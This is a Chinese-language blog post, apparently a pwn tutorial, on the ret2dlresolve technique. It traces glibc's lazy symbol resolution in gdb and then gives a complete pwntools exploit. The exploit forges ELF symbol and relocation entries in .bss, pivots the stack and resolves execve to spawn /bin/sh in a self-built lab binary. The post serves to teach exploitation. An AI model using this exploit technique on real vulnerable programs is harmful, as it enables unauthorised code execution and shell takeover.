<h2 id="三、调试"><a href="#三、调试" class="headerlink" title="三、调试"></a>三、调试</h2><p>我们在 gdb 里进入一个 libc 函数，</p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/dl.png" alt="image-20260105171814219"></p>
<p>可以看到，程序调用 libc 函数首先进入一个名叫 <code>puts@plt</code> 的函数 (0x401080) ，这是一个<strong>桩函数（stub）</strong>，真正的 <code>puts</code> 地址还没解析时，它会跳到后面的解析逻辑。</p>
<p>然后，从 0x401030 <strong>( plt[0] )</strong> 跳到 0x401020 <strong>(PLT0 的核心入口)</strong>，这里是 PLT 的通用入口，负责调用 <code>_dl_runtime_resolve_xsavec</code> ，它会把一个 <strong>重定位索引 (relocation index)</strong>。压栈，告诉动态链接器要解析哪个符号。</p>
<p>之后，进入 <code>_dl_runtime_resolve_xsavec</code> <strong>(glibc 内部)</strong>，</p>
<p><a href="%E5%85%B7%E4%BD%93%E6%9D%A5%E8%AF%B4%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E5%AF%B9%E9%BD%90%EF%BC%8C%E5%B0%B1%E4%BC%9A%E5%AF%BC%E8%87%B4%E8%A6%81%E4%B9%88%E6%89%BE%E9%94%99r_info%EF%BC%8C%E8%A6%81%E4%B9%88%E6%89%BE%E9%94%99system%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%B0%E5%9D%80(st_name)">^</a>: <em>dynamic loader runtime resolver (with xsavec variant) “动态加载器运行时解析函数（xsavec 版本）”</em></p>
<p>这是动态链接器的解析函数。它会根据 relocation 索引去 <code>.rela.plt</code> 找对应的 <code>Elf64_Rela</code> 条目。然后根据 <code>r_info</code> 找到符号表条目 (<code>Elf64_Sym</code>)。再根据 <code>st_name</code> 去字符串表 (<code>.dynstr</code>) 找函数名。最终解析出 libc 里的真实地址，并写入 GOT 表。</p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/push0.png" alt="image-20260105175210361"></p>
<p>注意这里的 <code>push 0</code>，这里正是压入的 <strong>重定位索引 (relocation index)</strong>，<em>给动态链接器传递参数，表示“这是第 0 个符号”</em>。即在这个 ELF 的 <strong>重定位表</strong> <code>.rela.plt</code> 里，<code>puts</code> 的条目排在第 0 个。当然，如果 <code>printf</code> 在索引 1 处，就会 <code>push 1</code></p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/fixup.png" alt="image-20260105194426293"></p>
<p>继续查看可以发现，<code>_dl_runtime_resolve_xsavec</code> 总体上的作用是通过 mov 保存和恢复寄存器状态，保证解析过程不会破坏寄存器。而其中 <code>_dl_fixup</code> 是真正的解析函数，它接收 relocation index，找到对应的 <code>.rela.plt</code> 条目。上图可以看到传参过程。</p>
<p>我们步入查看，还可以看到这些函数：<code>_dl_lookup_symbol_x</code>、<code>do_lookup_x</code>、<code>check_match</code>、<code>strcmp</code>。这里简单说明一下：</p>
<blockquote>
<ol>
<li><code>_dl_lookup_symbol_x</code>：这是一个“查找符号”的通用接口，它会在 <strong>link_map</strong>（即已加载的共享库列表）里查找目标符号，内部会调用 <code>do_lookup_x</code> 来做具体的查找工作。</li>
<li><code>do_lookup_x</code>：真正的查找过程在这里完成，它会遍历所有已加载的共享库（比如 libc.so、ld-linux.so），在它们的符号表里查找目标名字，查找时会调用 <code>check_match</code> 来判断某个符号是否匹配。</li>
<li><code>check_match</code>：用来检查候选符号是否和我们要找的符号一致。会比较符号名、版本信息、可见性等。在比较名字时最终会调用 <code>strcmp</code>。</li>
<li><code>strcmp</code>：最底层的字符串比较函数，<strong>内部调用，不用通过plt&#x2F;got解析</strong>，用来判断符号表里的名字（比如 <code>&quot;puts&quot;</code>, <code>&quot;system&quot;</code>) 是否和我们要解析的名字一致。如果匹配成功，就返回这个符号的地址。</li>
</ol>
</blockquote>
<p>最核心的部分还是在<code>_dl_fixup</code>这里，我们直接在调用现场看一下：</p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/%E8%B0%83%E7%94%A8%E7%8E%B0%E5%9C%BA.png" alt="image-20260107220959747"></p>
<p><a href="%E5%85%B7%E4%BD%93%E6%9D%A5%E8%AF%B4%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E5%AF%B9%E9%BD%90%EF%BC%8C%E5%B0%B1%E4%BC%9A%E5%AF%BC%E8%87%B4%E8%A6%81%E4%B9%88%E6%89%BE%E9%94%99r_info%EF%BC%8C%E8%A6%81%E4%B9%88%E6%89%BE%E9%94%99system%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%B0%E5%9D%80(st_name)">^</a>: _dl_fixup 简化原型 <code>void *_dl_fixup(struct link_map *l, ElfW(Word) reloc_index); </code></p>
<p><a href="%E5%85%B7%E4%BD%93%E6%9D%A5%E8%AF%B4%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E5%AF%B9%E9%BD%90%EF%BC%8C%E5%B0%B1%E4%BC%9A%E5%AF%BC%E8%87%B4%E8%A6%81%E4%B9%88%E6%89%BE%E9%94%99r_info%EF%BC%8C%E8%A6%81%E4%B9%88%E6%89%BE%E9%94%99system%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%B0%E5%9D%80(st_name)">^</a>: rdi：存放结构体指针，指向动态链接器内部的<code>struct link_map</code> 结构。<br><a href="%E5%85%B7%E4%BD%93%E6%9D%A5%E8%AF%B4%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E5%AF%B9%E9%BD%90%EF%BC%8C%E5%B0%B1%E4%BC%9A%E5%AF%BC%E8%87%B4%E8%A6%81%E4%B9%88%E6%89%BE%E9%94%99r_info%EF%BC%8C%E8%A6%81%E4%B9%88%E6%89%BE%E9%94%99system%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%B0%E5%9D%80(st_name)">^</a>: rsi：relocation index</p>
<blockquote>
<p>link_map(主程序) &lt;-&gt; link_map(libc.so) &lt;-&gt; link_map(ld-linux.so)<br>    │<br>    └─ l_ld → ElfXX_Dyn[]<br>               ├─ DT_SYMTAB → ElfXX_Sym[]<br>               ├─ DT_STRTAB → 字符串表<br>               └─ DT_JMPREL → ElfXX_Rela[]</p>
<p><strong>外层是 链表，每个节点内部再“分叉”到不同的表</strong></p>
</blockquote>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">link_map</span> &#123;</span></span><br><span class="line">    Elf64_Addr l_addr;        <span class="comment">// 模块(库)加载基址</span></span><br><span class="line">    <span class="type">char</span>      *l_name;        <span class="comment">// 模块(库)名字字符串</span></span><br><span class="line">    Elf64_Dyn *l_ld;          <span class="comment">// 指向 .dynamic 段</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">link_map</span> *<span class="title">l_next</span>;</span>  <span class="comment">// 链表下一个模块</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">link_map</span> *<span class="title">l_prev</span>;</span>  <span class="comment">// 链表上一个模块</span></span><br><span class="line">    Elf64_Dyn *l_info[DT_NUM];<span class="comment">// 保存 .dynamic 段里各个条目的指针</span></span><br><span class="line"> ...</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>所以，rsi &#x3D; 0 这是重定位索引；而 rdi &#x3D; 0x7ffff7ffe2e0，这就是一个 <code>link_map</code> 结构体的地址。它描述了当前 ELF 模块（这里的可执行文件）的加载信息：基址、名字、动态段、符号表、字符串表、重定位表等。</p>
<p>我们直接查看 0x7ffff7ffe2e0 处 <code>link_map</code> 结构体，更深理解一下</p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/linkmap.png" alt="屏幕截图 2026-01-24 195943"></p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/linkmap2.png" alt="image-20260124201816243"></p>
<p>解释：      </p>
<ul>
<li>l_addr &#x3D; 0 (主程序l_addr&#x3D;0(不需要加偏移),各个共享库等l_addr ≠ 0)        </li>
<li>l_name → 程序名字字符串(主程序一般为空)</li>
<li>l_ld → .dynamic 段 </li>
<li>l_next → 下一个 link_map</li>
<li>l_prev &#x3D; NULL        </li>
<li>l_real → 自指针&#x2F;内部字段</li>
<li>l_info &#x3D; […]</li>
</ul>
<p>再来看<code>l_info</code>数组，来自 <code>/usr/include/elf.h</code> 中的定义，<strong>重点在索引5、6、7，分别是字符串表地址、符号表地址、重定位表地址</strong>。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Dynamic section entry.  */</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> &#123;</span></span><br><span class="line">    Elf64_Sxword d_tag;            <span class="comment">/* Dynamic entry type */</span></span><br><span class="line">    <span class="class"><span class="keyword">union</span> &#123;</span></span><br><span class="line">        Elf64_Xword d_val;         <span class="comment">/* Integer value */</span></span><br><span class="line">        Elf64_Addr d_ptr;          <span class="comment">/* Address value */</span></span><br><span class="line">    &#125; d_un;</span><br><span class="line">&#125; Elf64_Dyn;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Dynamic array tags.  */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_NULL         0          <span class="comment">/* Marks end of dynamic array */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_NEEDED       1          <span class="comment">/* Name of needed library */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_PLTRELSZ     2          <span class="comment">/* Size in bytes of PLT relocs */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_PLTGOT       3          <span class="comment">/* Processor defined value */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_HASH         4          <span class="comment">/* Address of symbol hash table */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_STRTAB       5          <span class="comment">/* Address of string table */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_SYMTAB       6          <span class="comment">/* Address of symbol table */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_RELA         7          <span class="comment">/* Address of Rela relocs */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_RELASZ       8          <span class="comment">/* Total size of Rela relocs */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_RELAENT      9          <span class="comment">/* Size of one Rela reloc */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_STRSZ       10          <span class="comment">/* Size of string table */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_SYMENT      11          <span class="comment">/* Size of one symbol table entry */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_INIT        12          <span class="comment">/* Address of init function */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_FINI        13          <span class="comment">/* Address of termination function */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DT_SONAME      14          <span class="comment">/* Name of shared object */</span></span></span><br><span class="line"><span class="comment">// ... 还有很多其他定义</span></span><br></pre></td></tr></table></figure>



<p>下面是打印对应结构体内容。<code>d_ptr</code>就是对应地址，根据上面分析的索引5、6、7对应关系，我们查看相应地址处结构就是我们的伪造结构，具体见下面漏洞利用部分</p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/%E7%BB%93%E6%9E%84%E4%BD%93.png" alt="image-20260124232357327"></p>
<h2 id="四、漏洞利用"><a href="#四、漏洞利用" class="headerlink" title="四、漏洞利用"></a>四、漏洞利用</h2><p>我们的编译选项关闭了 PIE，直接去找地址。我们需要用 <code>read</code> 处函数地址来重定向到bss段、<code>.rela.plt段</code>地址来计算重定位条目偏移、 <code>.dynsym段</code> 地址来计算符号索引、<code>.dynstr段</code> 地址来计算字符串偏移。</p>
<blockquote>
<p>指令：readelf -S .&#x2F;ret2dlsolve | grep -E “(plt|got|dyn|bss|rela)”</p>
</blockquote>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/%E5%9C%B0%E5%9D%80.png" alt="image-20260117213619744"></p>
<p>我们第一步的重定向输入到 <code>bss段 </code>，就是通过覆盖 rbp 和返回地址重新读入，具体如exp，不在赘述</p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/%E9%87%8D%E5%AE%9A%E5%90%91.png" alt="image-20260117214206818"></p>
<p>在第二次读入时，我们已经在<code>bss段</code>，接下来的输入需要我们伪造<code>Elf64_Sym(符号表项)</code>、<code>Elf64_Rela(重定位表项)</code>以及 system 和 &#x2F;bin&#x2F;sh 字符串</p>
<p>这里我直接给出伪造的表项，以便理解</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Elf64_Sym 符号表 (24字节)</span></span><br><span class="line"><span class="comment"># 结构: [st_name(4)] [st_info(1)+st_other(1)+st_shndx(2)] [st_value(8)] [st_size(8)]</span></span><br><span class="line">st_name  = str_offset       <span class="comment"># 4字节</span></span><br><span class="line">st_info  = <span class="number">0x12</span>             <span class="comment"># STB_GLOBAL|STT_FUNC</span></span><br><span class="line">st_other = <span class="number">0x00</span></span><br><span class="line">st_shndx = <span class="number">0x0000</span></span><br><span class="line">st_value = <span class="number">0x0</span></span><br><span class="line">st_size  = <span class="number">0x0</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Elf64_Rela 重定位表 (24字节)</span></span><br><span class="line">r_info    = (sym_index &lt;&lt; <span class="number">32</span>) | reloc_type <span class="comment"># 构造 r_info</span></span><br><span class="line">r_offset  =  target_got_addr <span class="comment"># R_X86_64_JUMP_SLOT(跳转槽类型)  read@GLIBC_2.2.5</span></span><br><span class="line">r_addend  =  <span class="number">0</span></span><br></pre></td></tr></table></figure>

<p>我们重点来看3个表项，</p>
<ul>
<li><p>**<code>st_name</code> **：字符串表偏移，动态链接器会根据这个偏移找字符串，并让<code>_dl_lookup_symbol_x</code>函数去libc里查找解析。</p>
</li>
<li><p><strong><code>r_info</code></strong>：一个 64 位的复合字段，包含两部分信息：高 32 位是符号表索引（指向 <code>.dynsym</code> 的某个条目），低 32 位是重定位类型，一般用 <code>R_X86_64_JUMP_SLOT</code> (值是 7)，表示这是一个函数调用需要解析。</p>
</li>
<li><p><strong><code>r_offset</code></strong>：选择一个可写的GOT项写入（objdump -R .&#x2F;dlsolve64）。</p>
</li>
</ul>
<p>**数据结构伪造完成后，我们必须要知道具体的结构体起始地址。并且，因为每个结构体都是24字节，它的起始地址对于相应的动态段地址必须24字节对齐。**这里计算比较麻烦，我们先给出部分exp，之后解释原理。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">fake_base       =  bss_addr  + <span class="number">0x800</span>  <span class="comment"># 留出一些空间</span></span><br><span class="line">fake_sym_addr   =  fake_base          <span class="comment"># Elf64_Sym 结构</span></span><br><span class="line">fake_reloc_addr =  fake_base + <span class="number">0x20</span>   <span class="comment"># Elf64_Rela 结构</span></span><br><span class="line">fake_str_addr   =  fake_base + <span class="number">0x38</span>   <span class="comment"># &quot;system\x00&quot; 字符串</span></span><br><span class="line">fake_binsh_addr =  fake_base + <span class="number">0x40</span>   <span class="comment"># &quot;/bin/sh\x00&quot; 字符串</span></span><br><span class="line"></span><br><span class="line">str_offset    =  fake_str_addr - dynstr_addr <span class="comment"># 计算字符串偏移</span></span><br><span class="line">sym_index     = (fake_sym_addr - dynsym_addr)   // <span class="number">24</span> <span class="comment"># 计算符号索引</span></span><br><span class="line">reloc_offset  = (fake_reloc_addr - rel_plt_addr)// <span class="number">24</span> <span class="comment"># 计算伪造的重定位条目偏移</span></span><br></pre></td></tr></table></figure>

<p>我们的第二次输入整体上看是这样布局的：fake_sym(24字节) + fake_reloc(24字节) + system_str(8字节) + binsh_str(8字节) + padding + fake_rbp + …</p>
<p>由于起始地址对于相应的动态段地址必须24字节对齐，并且我们有两个24字节对齐(<code>str_offset</code>和<code>sym_index</code>)，实际调试过程中我们需要通过填充数据手动对齐。上面贴出的代码里可以看到 +0x20之类的，其实是在通过调整payload填充(<code>.ljust(0x20, b&#39;\x00&#39;)</code>)来手动对齐24，具体见exp。</p>
<p><a href="%E5%85%B7%E4%BD%93%E6%9D%A5%E8%AF%B4%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E5%AF%B9%E9%BD%90%EF%BC%8C%E5%B0%B1%E4%BC%9A%E5%AF%BC%E8%87%B4%E8%A6%81%E4%B9%88%E6%89%BE%E9%94%99r_info%EF%BC%8C%E8%A6%81%E4%B9%88%E6%89%BE%E9%94%99system%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%B0%E5%9D%80(st_name)">^</a>: 这里的bss段地址也要微调一下，我个人是先微调bss段地址，让(fake_sym_addr - dynsym_addr)可以以整除24，然后在 Elf64_Sym 后添加 padding 让(fake_reloc_addr - rel_plt_addr)可以以整除24。</p>
<p>最后，我们来看一下payload构造。首先是fake_sym和fake_reloc两个伪造结构，可以看到我填充一些 0，就是为了之前说过的 24 字节对齐，之后输入字符串 execve 和 &#x2F;bin&#x2F;sh，然后填充128字节缓冲区，覆盖返回地址修改参数（这里rdx已经是0就没有再设置）。最后跳转到PLT[0]解析就可以执行 execve</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">payload = fake_sym.ljust(<span class="number">0x20</span>, <span class="string">b&#x27;\x00&#x27;</span>) <span class="comment"># 在符号表条目后面加了一点 padding</span></span><br><span class="line">payload += fake_reloc.ljust(<span class="number">0x18</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += system_str</span><br><span class="line">payload += binsh_str</span><br><span class="line"></span><br><span class="line">payload = payload.ljust(<span class="number">128</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += p64(bss_addr+<span class="number">0x100</span>)  <span class="comment"># fake rbp</span></span><br><span class="line"></span><br><span class="line">payload += p64(pop_rdi_ret)</span><br><span class="line">payload += p64(fake_binsh_addr) <span class="comment"># system的参数: &quot;/bin/sh&quot;</span></span><br><span class="line">payload += p64(pop_rsi_ret)</span><br><span class="line">payload += p64(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">payload += p64(plt_0_addr)      <span class="comment"># 跳转到PLT[0]</span></span><br><span class="line">payload += p64(reloc_offset)    <span class="comment"># 重定位条目索引</span></span><br></pre></td></tr></table></figure>







<p>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>) </span><br><span class="line">io = process(<span class="string">&#x27;./ret2dlsolve3&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># =============== 地址 ===============</span></span><br><span class="line">main = <span class="number">0x0000000000401222</span></span><br><span class="line">re_read      = <span class="number">0x4011f0</span>    <span class="comment"># 重定向</span></span><br><span class="line">loop         = <span class="number">0x4011bf</span></span><br><span class="line">rel_plt_addr = <span class="number">0x4005a8</span>    <span class="comment"># .rela.plt</span></span><br><span class="line">dynsym_addr  = <span class="number">0x4003d8</span>    <span class="comment"># .dynsym  </span></span><br><span class="line">dynstr_addr  = <span class="number">0x4004b0</span>    <span class="comment"># .dynstr</span></span><br><span class="line">plt_0_addr   = <span class="number">0x401020</span>    <span class="comment"># PLT[0]</span></span><br><span class="line">bss_addr     = <span class="number">0x404030</span>    <span class="comment"># .bss</span></span><br><span class="line">pop_rdi_ret  = <span class="number">0x4011ba</span></span><br><span class="line">pop_rsi_ret  = <span class="number">0x4011bc</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># =============== 重定向 ===============</span></span><br><span class="line">io.recvuntil(<span class="string">b&#x27;Enter your message: &#x27;</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">128</span> + p64(bss_addr+<span class="number">0x80</span>+<span class="number">0x800</span>) + p64(re_read)</span><br><span class="line">io.send(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># =============== 伪造bss段条目 ===============</span></span><br><span class="line">fake_base       =  bss_addr  + <span class="number">0x800</span>  <span class="comment"># 留出一些空间</span></span><br><span class="line">fake_sym_addr   =  fake_base          <span class="comment"># Elf64_Sym 结构</span></span><br><span class="line">fake_reloc_addr =  fake_base + <span class="number">0x20</span>   <span class="comment"># Elf64_Rela 结构</span></span><br><span class="line">fake_str_addr   =  fake_base + <span class="number">0x38</span>   <span class="comment"># &quot;system\x00&quot; 字符串</span></span><br><span class="line">fake_binsh_addr =  fake_base + <span class="number">0x40</span>   <span class="comment"># &quot;/bin/sh\x00&quot; 字符串</span></span><br><span class="line"></span><br><span class="line">system_str = <span class="string">b&quot;execve\x00\x00&quot;</span> <span class="comment"># 构造字符串</span></span><br><span class="line">binsh_str  = <span class="string">b&quot;/bin/sh\x00&quot;</span></span><br><span class="line"></span><br><span class="line">str_offset    =  fake_str_addr - dynstr_addr <span class="comment"># 计算字符串偏移</span></span><br><span class="line">sym_index     = (fake_sym_addr - dynsym_addr)   // <span class="number">0x18</span> <span class="comment"># 计算符号索引</span></span><br><span class="line">reloc_offset  = (fake_reloc_addr - rel_plt_addr)// <span class="number">0x18</span> <span class="comment"># 计算伪造的重定位条目偏移</span></span><br><span class="line"></span><br><span class="line">st_name  = str_offset       <span class="comment"># 4字节</span></span><br><span class="line">st_info  = <span class="number">0x12</span>            <span class="comment"># STB_GLOBAL|STT_FUNC</span></span><br><span class="line">st_other = <span class="number">0x00</span></span><br><span class="line">st_shndx = <span class="number">0x0000</span></span><br><span class="line">st_value = <span class="number">0x0</span></span><br><span class="line">st_size  = <span class="number">0x0</span></span><br><span class="line"></span><br><span class="line">reloc_type    =  <span class="number">0x7</span>  <span class="comment"># R_X86_64_JUMP_SLOT</span></span><br><span class="line">target_got_addr = <span class="number">0x404018</span> <span class="comment"># 选择一个可写的GOT项写入（objdump -R ./dlsolve64）</span></span><br><span class="line"></span><br><span class="line">r_info    = (sym_index &lt;&lt; <span class="number">32</span>) | reloc_type <span class="comment"># 构造 r_info</span></span><br><span class="line">r_offset  =  target_got_addr <span class="comment"># R_X86_64_JUMP_SLOT  read@GLIBC_2.2.5</span></span><br><span class="line">r_addend  =  <span class="number">0</span></span><br><span class="line"></span><br><span class="line">fake_sym = p32(st_name)                  <span class="comment"># 4字节: st_name：字符串表偏移</span></span><br><span class="line">fake_sym += p8(st_info) + p8(st_other) + p16(st_shndx)  <span class="comment"># 4字节（1字节：符号绑定和类型 1字节：保留字段 2字节：符号所在的段索引</span></span><br><span class="line">fake_sym += p64(st_value)                <span class="comment"># 8字节: st_value：符号的值（地址）</span></span><br><span class="line">fake_sym += p64(st_size)                 <span class="comment"># 8字节: st_size：符号大小</span></span><br><span class="line"></span><br><span class="line">fake_reloc = p64(r_offset)    <span class="comment"># 8字节: r_offset</span></span><br><span class="line">fake_reloc += p64(r_info)     <span class="comment"># 8字节: r_info</span></span><br><span class="line">fake_reloc += p64(r_addend)   <span class="comment"># 8字节: r_addend</span></span><br><span class="line"></span><br><span class="line">payload = fake_sym.ljust(<span class="number">0x20</span>, <span class="string">b&#x27;\x00&#x27;</span>) <span class="comment"># 在符号表条目后面加了一点 padding</span></span><br><span class="line">payload += fake_reloc.ljust(<span class="number">0x18</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += system_str</span><br><span class="line">payload += binsh_str</span><br><span class="line"></span><br><span class="line">payload = payload.ljust(<span class="number">128</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += p64(bss_addr+<span class="number">0x100</span>)  <span class="comment"># fake rbp</span></span><br><span class="line"></span><br><span class="line">payload += p64(pop_rdi_ret)</span><br><span class="line">payload += p64(fake_binsh_addr) <span class="comment"># system的参数: &quot;/bin/sh&quot;</span></span><br><span class="line">payload += p64(pop_rsi_ret)</span><br><span class="line">payload += p64(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">payload += p64(plt_0_addr)      <span class="comment"># 跳转到PLT[0]</span></span><br><span class="line">payload += p64(reloc_offset)    <span class="comment"># 重定位条目索引</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(io,&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="comment">#b *0x401020</span></span><br><span class="line"><span class="comment">#c</span></span><br><span class="line"><span class="comment">#&#x27;&#x27;&#x27;)</span></span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line"></span><br><span class="line">io.send(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="小注"><a href="#小注" class="headerlink" title="小注"></a>小注</h2><p>第一次我是想构造 system(&#x2F;bin&#x2F;sh)，设置断点可以看到程序已经解析出了<code>system</code>，但是<code>system</code>内部执行时 posix_spawn 函数出了一些问题导致父进程退出，查了一下应该是 attrp 数组指针的问题，由于栈迁移到了bss段，无法完全控制 attrp 数组，导致崩溃</p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/system.png" alt="image-20260124234656972"></p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/error.png" alt="image-20260124235937435"></p>
<p>更稳定的方式是构造 execuv ，不过自己编译的这个程序比较小，没有出现pop rdi ret和pop rsi ret，所以我就显式写了一个内联汇编函数，保证出现pop rdi ret和pop rsi ret去实现 execve</p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/execve.png" alt="image-20260130113429885"></p>
<p><img src="/images/26-1-29-ret2dlresolve%E6%8A%80%E6%9C%AF/result.png" alt="image-20260130113657102"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
